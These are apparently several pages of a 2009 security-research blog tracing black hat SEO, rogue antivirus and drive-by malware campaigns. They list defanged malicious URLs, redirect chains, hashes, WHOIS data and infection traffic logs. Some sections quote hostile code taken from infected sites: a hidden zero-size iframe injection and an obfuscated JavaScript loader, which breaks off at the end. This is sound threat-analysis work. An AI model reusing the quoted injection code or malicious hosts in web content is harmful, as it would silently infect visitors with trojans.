Black Hat SEO and Rogue Antivirus p.9

The silent threat: Black Hat SEO and Rogue Antivirus Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more READ THIS page if you need more information After Trend Micro researchers claimed that Easter related sites were used to redirect visitors to rogue antivirus websites, PandaLabs recently uncovered similar Black hat SEO attacks against Ford and Ned.org. By mis-using keywords typically related to global businesses and institutions, the criminals attract unsuspecting visitors to compromized web sites. These sites deceive visitors into downloading and installing a fake antivirus product that is very hard to deactivate or remove.The rogue antivirus gives false alerts to the user making them think that theircomputer is infected. Scared users are then susceptible to buying the "antivirus protection" via a page that looks like a secure SSL web site. In fact, their money are confidential credit card information are stolen by the criminals the moment that they enter their personal information into the payment page. Many global companies, including Ford have been exploited in this way. Over a million compromized web sites used Ford-based keywords to attract visitors to fake antivirussites via search engines such as Google (Black hat SEO may force Google to change algorithm).Other examples of this attack include the mis-use of Easter related keywords to attract unsuspecting visitors during the Easter season (Trend Micro Malware Blog - Rotten Eggs: An Easter Malware Campaign). There are other variants of this type of attack originating from the same Ukraine / Russianbased criminal fraternity. For example, the criminals use technical exploits to compromizeweb sites, blog, forums and the like. Wordpress blog management software has been a victim of such an exploit allowing the criminals to inject malicious code directly into all pages.A visitor to one of these infected sites will beredirected to another site where rogue antivirus software is again downloaded (PandaLabs: New Blackhat SEO attack exploits vulnerabilities in Wordpressto distributerogue antivirus software). The criminals put a lot of effort into assuring the longevity of their scam. Frequent IP changes and moving from location to location help ensure that they can continue their activities. You can get more information about all these attacks from the following resources. The PandaLabs video gives a particularly clear and concise overview. The following links provide more information about this attack: The Tech Herald: Malicious SEO targets Ford Motor Company PandaLabs: Targeted Blackhat SEO Attack against Ford Motor Co. Read the article on WebProNews: Blackhat SEO spammers force Google’s hand Related attack: PandaLabs: Blackhat SEO Fueled Rogue Security Campaign Sample hijacked search terms (text file) The website implicated is: getscanonline.com (also hosted on 209.44.126.14). Softpedia: Easter and Ford Search Results Poisoned In this case, the files found on the site are detected by Trend Micro as TROJ_FAKEAV.BAF - JS_DLOADER.WKQ The websites in question are: trustsecurityshield.com and topsecurity4you.com which both have served for only two or three days (hosted on 209.44.126.14). Technicals details can be found below Vulnerabilities in Wordpress exploited to distribute rogue antivirus software Watch the full video: I will take your attention on the video above. This is a screenshot at 03:11 If you zoom into it you will see the domain "load-archive-av-pro.com". The domain is still active and shared with many other fake scanner websites like "antivir-scan-pro-best.com" for the location of the payload. Wepawet Analysis The process: I will take some words found on Ned.org for example. The google cache: The poisoned keywords: "Kettle Vally Line Song" The google search: The redirection analysis: hxxp://cropperddi.fortunecity.com/6766.html hxxp://sandbergjbo.fortunecity.com/26894.html Analysis -> redirect to a traffic management system Analysis -> redirect to a traffic management system hxxp://redirxl.com/filt/in.cgi?5&group=5q which then redirect to the malicious site hxxp://antivir-scan-pro-best.com/11038/3/ The payload in located on the same site that appear on the PandaLabs article which is: hxxp://files.load-archive-av-pro.com/normal/ setup_11038_3_1.exe File size: 104971 bytes MD5...: 2a9889219ec9d0124892e5e64eaed2bd VirusTotal Anubis --------------------------- 64.69.32.220 antivir-scan-pro-best.com Registrant: Lee Brinkman (leebrinkm@gmail.com) 4396 Ross Street Mount Vernon Illinois,62864 US Tel. +001.65746675653 Creation Date: 17-Apr-2009 Expiration Date: 17-Apr-2010 Domain servers in listed order: ns2.antivir-scan-pro-best.com ns1.antivir-scan-pro-best.com Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM Also on this IP - previously used checker-pc-pro-av.com sheck-pro-as.com --------------------------- 195.88.80.127 - ECOWEB AS35695 - ecoweb.lv load-archive-av-pro.com files.load-archive-av-pro.com Registrant:Mary Smalls (mary.sma0@gmail.com) 2251 Doctors Drive Los Angeles California,90066 US Tel. +001.86758776498 Creation Date: 17-Apr-2009 Expiration Date: 17-Apr-2010 Domain servers in listed order: ns2.load-archive-av-pro.com ns1.load-archive-av-pro.com Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM Also on this IP - previously used download-pro-as.net load-antivir-pro-pc.com files.load-antivir-pro-pc.com download-pro-as.net From the article on PandaLabs' blog about the SEO attack against Ford Motor Co. you can see the domain "globextubes.com" previously hosted on 64.69.32.203. This is a graph (from Robtex) of some of these sites serving in the same campaign: fasttube2009.com globalstube2009.com globextubes.com streamingtubes2009.com This is a file found on one of these site: softwarefortubeview.40011.exe VirusTotal Report Anubis Report Complete analysis below: After running it connect to this URL to received additional payloads to inject. nhgfngfdhngf.com - 216.240.148.9 ThreatExpert Report hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8 cd98f00b204e9800998ecf8427e&os=512 hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d 8cd98f00b204e9800998ecf8427e&os=512 (216.240.148.9) The page show these URL (Added file info and virustotal report) ---------------------------------------------------- hxxp://images2009best.com/perce/ 30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230 740e19c810803919c83e9c9f487472375ee/70e/perce.jpg VirusTotal - 4/40 (10%) Anubis Report File size: 94212 bytes MD5...: e49048a38d0757b92a34dff6fc3b3f74 HTTP Activity: 216.240.157.91 [imagesrepository.com] Request: POST /resolution.php 88.214.205.8 [zone-searching.com] Request: POST /borders.php ---------------------------------------------------- hxxp://venerapictures.com/item/6000dc4d413ac4f08d c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0 c4f78441277ced/b0b/item.gif VirusTotal - 7/40 (17.5%) Anubis Report File size: 145412 bytes MD5...: d2b451fee4f7c42b06121cf03f8ea281 ---------------------------------------------------- hxxp://venerapictures.com/werber/900/216.jpg VirusTotal - 8/40 (20%) Anubis Report File size: 99332 bytes MD5...: 5bc8a73f3412c574909e5f3c193fed89 ---------------------------------------------------- hxxp://files.get-fails-load-av.com/exe/setup_200002.exe VirusTotal - 9/40 (22.5%) Anubis Report File size: 78347 bytes MD5...: ff220534519a1a116dbc2dd712bff24a HTTP Activity: 195.88.81.116 [dl.scan-anti-spy-4free.com] 195.88.80.207 [int.reporting32.com] ---------------------------------------------------- hxxp://lwl-softwares.com/939.exe VirusTotal - 0/39 (0%) Anubis Report File size: 180224 bytes MD5...: 1ff562c02c68f0a8001135dc89b4eaa1 HTTP Activity: 78.47.186.162 [hitmidpoint.com] Request: GET /?accs=939& tid=100 84.243.252.87 [staritquick.com] Request: GET /in.cgi?9& gai=cspsa3p&gli=273& gff=cs_221227254&al= 89.248.168.46 [toppromooffer.com] Request: GET /srm/adv/142/?a= cspsa3p&l=273&f= cs_221227254&ex=& ed=&sub=csp&prodabbr=USRM ---------------------------------------------------- hxxp://lwl-softwares.com/important.exe Anubis Report File size: 135168 byte MD5...: 83b4560333601224cb0d5709bdf57191 Trojan.Win32.Tibs

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan READ THIS page if you need more information A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon. All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below) Check it out - maybe someone have access to your PC right now! Protect yourself. Also Google show 14,800 result for this phrase. Detection: Trojan TDSS Trojan DNSChanger Trojan Kryptik Trojan FakeSpyGuard Trojan InternetAntivirusPro Sites serving for the fake antivirus campaign: 209.44.126.14 activesecurityshield.com anytoplikedsite.com basevirusscan.com bestfiresfull.com bestsecurityupdate.com checkonlinesecurity.com cleanyourpcspace.com destroyvirusnow.com fastsecurityscan.com fastviruscleaner.com firstscansecurity.com fuc*moneycash.com fullandtotalsecurity.com fullsecurityshield.com getpcguard.com getscanonline.com getsecuritywall.com greatsecurityshield.com inetsecuritycenter.com initialsecurityscan.com mostpopularscan.com myfirstsecurityscan.com mytoplikedsite.com mytopvirusscan.com onlinescandetect.com onlinescanservice.com popularpcscan.com runpcscannow.com scanalertspage.com scanbaseonline.com scanprotectiononline.com scanvistanow.net securityscan4you.com securitytopagent.com thegreatsecurity.com todaybestscan.com topsecurity4you.com topsecurityapp.com topsoftscanner.com totalpcdefender.com totalvirusdestroyer.com truescansecurity.com trustsecurityshield.com upyoursecurity.com virustopshield.com vistastabilitynow.com vistastabilitynow.net websecuritymaster.com websecurityvoice.com yourstabilitysystem.com 209.44.126.16 systemsecurityonline.com systemsecuritytool.com 209.44.126.29 individualpeople.biz (will be analyzed below) 209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23 NS for rogue fake av websites 209.44.126.32 asmmnation.com ThreatExpert report In conjunction with an IP in ukraine : Symantec write up On this IP 209.44.126.29 we also have a couple of page with exploits which leads to the trojan TDSS (Alureon). I will take this domain for example "individualpeople[.]biz" Malicious script (IFRAME) inserted. Redirection Analysis <iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> Redirects to the page below which host several exploits. Javascript Analysis (Wepawet) hxxp://individualpeople.biz/go.php?sid=6 Anubis Report hxxp://209.44.126.30/unsecurity/pdf.php Wepawet Analysis - VirusTotal to finally load this page hxxp://209.44.126.30/unsecurity/load.php VirusTotal - Anubis Detections: W32/Alureon.B!Generic Win32.Rootkit.TDSS.eyj.4 Packed.Win32.Tdss.f Trojan.Win32.FakeSpyguard Trojan:Win32/Alureon.gen!J Trojan/Fakealert.gen -------------------------------------- HTTP activity after infection 92.48.91.145:80 - [trafficstatic.net] Request: GET /banner/crcmds/main Response: 200 "OK" Request: GET /banner/crcmds/init Response: 200 "OK" Request: GET /banner/uacsrcr.dat Response: 200 "OK" Request: GET /banner/crcmds/update Response: 200 "OK" Request: GET /banner/crfiles/uacd Response: 200 "OK" Request: GET /banner/crfiles/uacc Response: 200 "OK" Request: GET /banner/crfiles/uaclog Response: 200 "OK" Request: GET /banner/crfiles/uacmask Response: 200 "OK" Request: GET /banner/crfiles/uacserf Response: 200 "OK" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/builds/bbr Response: 200 "OK" Request: GET /banner/crfiles/uacbbr Response: 200 "OK" 72.233.114.126:80 - [statsanalist.cn] Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 Response: 200 "OK" Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 Response: 200 "OK" IPs implicated: 209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23 209.44.126.29 209.44.126.32 Other domain in conjunction can be found using ThreatExpert /banner/crcmds/main Report 1 Report 2 92.48.91.144 trafficstatic.com explorerex.com windowslogonex.com 92.48.91.145 trafficstatic.net ThreatExpert Report 95.211.14.159 golddiggero1.com 76.76.103.162 webieupdate.net 94.76.208.32 symupdate2.com ThreatExpert Report 72.233.114.125 webnicrisoft.net ThreatExpert Report 64.213.140.254 webmsupdate.net ThreatExpert Report

Black Hat SEO - RBN Hacks, p.4

The silent threat: Black Hat SEO, exploits, hacks, botnets Crimeware toolkits in the wild READ THIS page if you need more information WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead to trojans beeing automatically installed on your computer. Do NOT visit them unless you know what you are doing. (only links are safe) Another very good example on the site below which lead to other domain in the network previously cited "Eurohost LLC " shows that this attack seems to be everywhere. IFrames injected, pdf malware + viruses. Attached some screenshots. Infected page: hxxp://team-sleep.by.ru/default2.html Analysis hxxp://8addition.info/t/?75724cae9d hxxp://sexbases.cn/in.cgi?16&161b72 hxxp://utevox.site90.com/f/index.php ************ Infected page: hxxp://team-sleep.by.ru/demo.html Analysis Requests: hxxp://bizoplata.ru/pay.html? hxxp://bizoplata.ru/ballast.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://bizoplata.ru/post.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://mixbunch.cn/bowling.html hxxp://famajormusic.ru/jjkj/pdf.php Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/gold.html Analysis Requests: hxxp://team-sleep.by.ru/gold.html hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php Redirects: hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php ************ Infected page: hxxp://team-sleep.by.ru/googleanalyticsru.html Analysis Requests: hxxp://team-sleep.by.ru/googleanalyticsru.html hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://sunmaiamibich.ru/ Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php ************ Infected page: hxxp://team-sleep.by.ru/media.html Analysis Requests: hxxp://team-sleep.by.ru/media.html hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php Redirects: hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php ************ Infected page: hxxp://team-sleep.by.ru/menu.html Analysis Requests: hxxp://team-sleep.by.ru/menu.html hxxp://bizoplata.ru/pay.html? hxxp://bizoplata.ru/ballast.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://bizoplata.ru/post.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://mixbunch.cn/bowling.html Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/news.html Analysis Requests: hxxp://moneypuller.site90.net/images/gallery/index.php hxxp://error.000webhost.com/not_found.html hxxp://www.000webhost.com/?id=1 hxxp://www.000webhost.com/ hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php ************ Infected page: hxxp://team-sleep.by.ru/photo2.html Analysis Requests: hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://bizoplata.ru/pay.html? hxxp://bizoplata.ru/ballast.html hxxp://bizoplata.ru/post.html hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/poem.html Analysis Requests: hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://bizoplata.ru/pay.html? hxxp://bizoplata.ru/ballast.html hxxp://bizoplata.ru/post.html Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php ************ Infected page: hxxp://team-sleep.by.ru/press_reviews.html Analysis Requests: hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/team-sleep.html Anaysis Redirects: hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php Redirects: hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/gmail.php Analysis Requests: hxxp://counnter.cn/top100_00.js hxxp://counnter.cn/z/count.php?o=1 hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php Redirects: hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/haitou.php Analysis Requests: hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/in.php Analysis Requests: hxxp://www.rogercombs.org/index.php hxxp://5rublei.com/unique/index.php hxxp://tochtonenado.com/yes/index.php ************ Infected page: hxxp://team-sleep.by.ru/photo/team.html Analysis Requests: hxxp://analytics-google.info/s/urchin.js hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://77.221.133.172/.if/go.html? hxxp://by.ru/info/?where ************ Infected page: hxxp://team-sleep.by.ru/photo/wallz.html Analysis Requests: hxxp://analytics-google.info/s/urchin.js hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php hxxp://bizoplata.ru/pay.html? hxxp://bizoplata.ru/ballast.html hxxp://bizoplata.ru/post.html hxxp://by.ru/info/?where ************ Infected page: hxxp://team-sleep.by.ru/photo/live/index2.html Analysis Requests: hxxp://utevox.site90.com/f/index.php hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php ************ Infected page: hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html Analysis Requests: hxxp://analytics-google.info/s/urchin.js hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php ************ Infected page: hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html Analysis Requests: hxxp://analytics-google.info/s/urchin.js hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php ************ Infected page: hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html Analysis On this page the domain appears to be previously involved in the Asprox malware campaign. As you can see the fgg.js and script.js are still present on the page. However all of these are not responding. Finjan report Google Searchfor fgg.js Google Search for www.netcfg9.ru hxxp://www.jve4.ru/fgg.js hxxp://www.nmr43.ru/fgg.js hxxp://www.mj5f.ru/script.js hxxp://www.vswc.ru/script.js hxxp://www.pkseio.ru/script.js hxxp://www.4log-in.ru/script.js hxxp://www.netcfg9.ru/script.js hxxp://www.sitevgb.ru/script.js hxxp://www.errghr.ru/script.js hxxp://www.81dns.ru/script.js hxxp://mixbunch.cn/thread.html hxxp://mixbunch.cn/golf.html hxxp://tixwagoq.cn/in.cgi?4 hxxp://paylayos.cn/nuc/index.php hxxp://mixbunch.cn/bowling.html hxxp://sunmaiamibich.ru/pupu/in.php hxxp://famajormusic.ru/jjkj/pdf.php ************ Infected page: hxxp://tochtonenado.com/yes/index.php hxxp://tochtonenado.com/yes/load.php?stat=Windows Analysis Trojan Waledac.GEN Anubis Report Botnet Controller 89.149.244.140:80 - [djbobroff.ru] Request: GET /spm/index.php?id=584E5E43 Response: 200 "OK" Request: GET /spm/index.php?id=584E5E43&download=0000138F Response: 200 "OK" Request: POST /spm/index.php?id=584E5E43&mid=5007 Response: 200 "OK" C:\WINDOWS\system32\DRIVERS\asyncmac.sys ***************** Exploits: hxxp://5rublei.com/unique/index.php Analysis - VirusTotal - Anubis hxxp://bizoplata.ru/ballast.html Analysis hxxp://bizoplata.ru/courier.html Analysis hxxp://bizoplata.ru/pay.html? Analysis hxxp://bizoplata.ru/post.html Analysis hxxp://dasretokfin.com/load.php Analysis hxxp://mixbunch.cn/thread.html Analysis hxxp://mixbunch.cn/golf.html Analysis hxxp://mixbunch.cn/bowling.html Analysis hxxp://peskufex.cn/ss/in.cgi?2 Source hxxp://startdontstop.ru/bigmac.html Analysis hxxp://sunmaiamibich.ru/pupu/in.php Analysis hxxp://sunmaiamibich.ru/pupu/load.php VirusTotal - Anubis hxxp://tixwagoq.cn/in.cgi?4 Analysis hxxp://tochtonenado.com/yes/index.php Analysis hxxp://tochtonenado.com/yes/load.php Anubis hxxp://tochtonenado.com/yes/include/spl.php Analysis hxxp://utevox.site90.com/f/index.php Analysis hxxp://utevox.site90.com/f/load.php dead 91.212.41.91 hxxp://mixbunch.cn hxxp://sunmaiamibich.ru 91.212.65.7 hxxp://peskufex.cn 95.129.144.228 hxxp://5rublei.com hxxp://dasretokfin.com hxxp://tochtonenado.com 95.129.144.13 hxxp://bizoplata.ru hxxp://startdontstop.ru 64.235.52.170 hxxp://utevox.site90.com ************************ Domain Name: mixbunch.cn ROID: 20081108s10001s82359461-cn Domain Status: clientTransferProhibited Registrant Organization: Raymond Keaton Registrant Name: Raymond Keaton Administrative Email: Keaton@cybernauttech.com Sponsoring Registrar: 广东时代互联科技有限公司 Name Server:ns1.softwaresupport-group.com Name Server:ns2.softwaresupport-group.com Registration Date: 2008-11-08 16:06 Expiration Date: 2009-11-08 16:06 domain: sunmaiamibich.ru type: CORPORATE nserver: ns1.softwaresupport-group.com. nserver: ns2.softwaresupport-group.com. state: REGISTERED, DELEGATED person: Private person phone: +7 910 3478712 e-mail: dmitrijstanislavskij@yandex.ru registrar: REGRU-REG-RIPN created: 2009.04.16 paid-till: 2010.04.16 source: TC-RIPN Domain Name: peskufex.cn ROID: 20090315s10001s50367993-cn Domain Status: clientDeleteProhibited Domain Status: clientTransferProhibited Registrant Organization: 永也进出口公司 Registrant Name: 张龙 Administrative Email: alvin_555@yeah.net Sponsoring Registrar: 易名中国 Name Server:ns2.dnsmytruedns.com Name Server:ns1.dnsmytruedns.com Registration Date: 2009-03-15 15:37 Expiration Date: 2010-03-15 15:37 Domain Name: 5rublei.com Registrar: BIZCN.COM, INC. Whois Server: whois.bizcn.com Referral URL: http://www.bizcn.com Name Server: NS1.EVERYDNS.NET Name Server: NS2.EVERYDNS.NET Name Server: NS3.EVERYDNS.NET Name Server: NS4.EVERYDNS.NET Status: clientDeleteProhibited Status: clientTransferProhibited Updated Date: 31-mar-2009 Creation Date: 30-jun-2008 Expiration Date: 30-jun-2010 Domain Name: dasretokfin.com Registrar: REGTIME LTD. Whois Server: whois.regtime.net Referral URL: http://www.webnames.ru Name Server: NS1.AFRAID.ORG Name Server: NS2.AFRAID.ORG Name Server: NS3.AFRAID.ORG Name Server: NS4.AFRAID.ORG Status: ok Updated Date: 24-mar-2009 Creation Date: 18-feb-2009 Expiration Date: 18-feb-2010 Domain Name: tochtonenado.com Registrar: UK2 GROUP LTD. Whois Server: whois.hostingservicesinc.net Referral URL: http://www.uk2group.com/ Name Server: NS1.EVERYDNS.NET Name Server: NS2.EVERYDNS.NET Name Server: NS3.EVERYDNS.NET Name Server: NS4.EVERYDNS.NET Status: clientTransferProhibited Updated Date: 25-mar-2009 Creation Date: 25-mar-2009 Expiration Date: 25-mar-2010 domain: bizoplata.ru type: CORPORATE nserver: ns1.sevensearchon.ru nserver: ns2.sevensearchon.ru state: REGISTERED, DELEGATED person: Private Person phone: +7 495 0000000 e-mail: tuhov83@mail.ru registrar: CT-REG-RIPN created: 2009.01.23 paid-till: 2010.01.23 source: TC-RIPN domain: startdontstop.ru type: CORPORATE nserver: ns1.sevensearchon.ru. nserver: ns2.sevensearchon.ru. state: REGISTERED, DELEGATED person: Private Person phone: +7 916 7843219 e-mail: ale32888049@yandex.ru registrar: NAUNET-REG-RIPN created: 2009.04.14 paid-till: 2010.04.14 source: TC-RIPN

Black Hat SEO - RBN Hacks, p.3

The silent threat: Black Hat SEO, exploits, hacks, botnets Triple threats READ THIS page if you need more information WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead to trojans beeing automatically installed on your computer. Do NOT visit them unless you know what you are doing. (only links are safe) The story about "Hosted JavaScript leading to .cn PDF Malware" which has implicated clarafin[.]info, fabiomotor[.]cn and letomerin[.]cn continue! New sites appear as intermediaries for distributing malware. About beebest[.]cn I will take this domain for example "cmizziconstruction.com" The Diagnostic page for cmizziconstruction.com. (Provided by Google Safe Browsing) In the source code we can see: <script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d 2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534() ));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){ var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49 d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43< h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647 24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36='' ;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628 216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+ r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027 '+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366 5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+' 332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+ '342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253 7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36 +'392532652536332536662536642532662536392536652532652537'+r36+'302 536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34 2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346 42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536 6625366425323825323925326125333425333125333125333325333825323925 3262253237'+r36+'253334253338253336253338253636253336253336253237' +r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364 253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363 82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+' 342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253 7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925 3361253638253639253634253634253635253665253237'+r36+'253365253363 2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29 